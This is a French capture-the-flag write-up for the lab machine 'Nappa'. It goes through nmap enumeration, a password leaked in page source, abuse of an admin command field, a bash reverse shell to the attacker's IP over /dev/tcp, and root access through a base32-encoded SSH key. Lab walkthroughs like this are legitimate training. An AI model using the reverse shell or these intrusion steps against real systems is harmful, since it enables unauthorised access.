Nappa

ruby enumération md5

  • Nom machine : Nappa

  • Difficulté : Intermédiaire

  • OS : Linux

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 14:19 EDT
Nmap scan report for 192.168.233.114
Host is up (0.031s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.45.176
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x   14 14       11           4096 Nov 06  2020 forum
3306/tcp  open  mysql?
| fingerprint-strings: 
|   NULL, SIPOptions, TLSSessionReq, TerminalServerCookie: 
|_    Host '192.168.45.176' is not allowed to connect to this MariaDB server
8080/tcp  open  http-proxy
|_http-title: ForumOnRails
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 3102
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <title>Action Controller: Exception caught</title>
|     <style>
|     body {
|     background-color: #FAFAFA;
|     color: #333;
|     margin: 0px;
|     body, p, ol, ul, td {
|     font-family: helvetica, verdana, arial, sans-serif;
|     font-size: 13px;
|     line-height: 18px;
|     font-size: 11px;
|     white-space: pre-wrap;
|     pre.box {
|     border: 1px solid #EEE;
|     padding: 10px;
|     margin: 0px;
|     width: 958px;
|     header {
|     color: #F0F0F0;
|     background: #C52F24;
|     padding: 0.5em 1.5em;
|     margin: 0.2em 0;
|     line-height: 1.1em;
|     font-size: 2em;
|     color: #C52F24;
|     line-height: 25px;
|     .details {
|_    bord
28080/tcp open  http       Apache httpd 2.4.46 ((Unix))
|_http-server-header: Apache/2.4.46 (Unix)
|_http-title: html5-goku-en-javascript
| http-methods: 
|_  Potentially risky methods: TRACE
60022/tcp open  ssh        OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey: 
|   3072 76:61:5c:e1:8c:ca:14:e8:7a:63:ba:a3:46:9f:09:b3 (RSA)
|   256 e3:ed:fc:a8:10:d7:8e:b1:7c:de:a2:59:df:19:06:29 (ECDSA)
|_  256 e5:dd:dd:a7:e3:ac:5f:b9:2b:4b:d0:27:e3:3c:c2:43 (ED25519)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============

FTP (21)

Nous regarderons ces fichiers plus tard, nous allons d'abord nous intéresser aux autres ports d'ouverts.

HTTP (28080)

Un jeu ! On lancer un scan dirbuster et on trouve un fichier README.md qui nous renvoit sur le github du jeu.

HTTP (8080)

Nous avons face à nous un forum porté sur le jeux vidéos et les mangas. Nous pouvons nous créer un compte. Il y a plusieurs utilisateurs.

En tappant sur "n'importe quoi" dans l'url, on tombe sur un nom d'utilisateur

Kathleen:kathleen ne fonctionne pas par ssh sur le port 60022, nous allons essayer de bruteforce, en vain.

Jusque là nous bloquons un peu. Nous sommes revenus sur les fichiers http mais rien trouvé d'intéressants. Nous avons commencé à regarder les codes sources de la page, et on trouve quelque chose de fort utile dans "register" : it0jNc6L/r090Q==

Un mot de passe !

Nous savons que pour se connecter il faut un mail, et celui de l'admin est facilement trouvable, il l'a posté sur le forum.

Accès initial

De part notre rôle d'admin, nous avons une nouvelle fonction à partir de serverinfo.

La page parâit ne pas faire grand chose de premier abord mais il faut là encore regarder le code source, et modifié une partie commentée.

Clic droit + edit as HTML

Cela ne fonctionne pas, normal nous avons laissé le readonly ! Une fois supprimé :

Bingo ! Nous pouvons exécuter des commandes !

/bin/bash -i >& /dev/tcp/192.168.45.176/1234 0>&1 dans le forumlaire...

Nous sommes kathleen !

Elévation des privilèges

Nous allons énumérer les fichier présents dans le repértoires de kathleen et l'un semble particulièrement intéressant et peu habituel.

https://www.dcode.fr/identification-chiffrement

Il nous indique que c'est du base32. Nous allons donc le déchiffrer

Une clef ssh ! Nous allons la copier dans un fichier.

Nous sommes root !

Mis à jour